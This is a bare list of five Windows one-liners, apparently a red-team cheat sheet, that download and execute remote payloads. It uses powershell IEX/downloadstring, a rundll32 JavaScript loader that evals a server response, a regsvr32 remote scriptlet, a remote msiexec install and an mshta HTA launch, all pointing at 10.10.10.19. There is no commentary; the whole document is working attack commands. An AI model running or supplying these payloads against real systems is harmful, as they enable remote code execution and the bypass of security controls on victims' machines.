powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.19/evil.txt'))"
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://10.10.10.19:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
regsvr32.exe /u /n /s /i:http://10.10.10.19:8888/file.sct scrobj.dll
msiexec /q /i http://10.10.10.19/evil.msi
mshta http://10.10.10.19/run.hta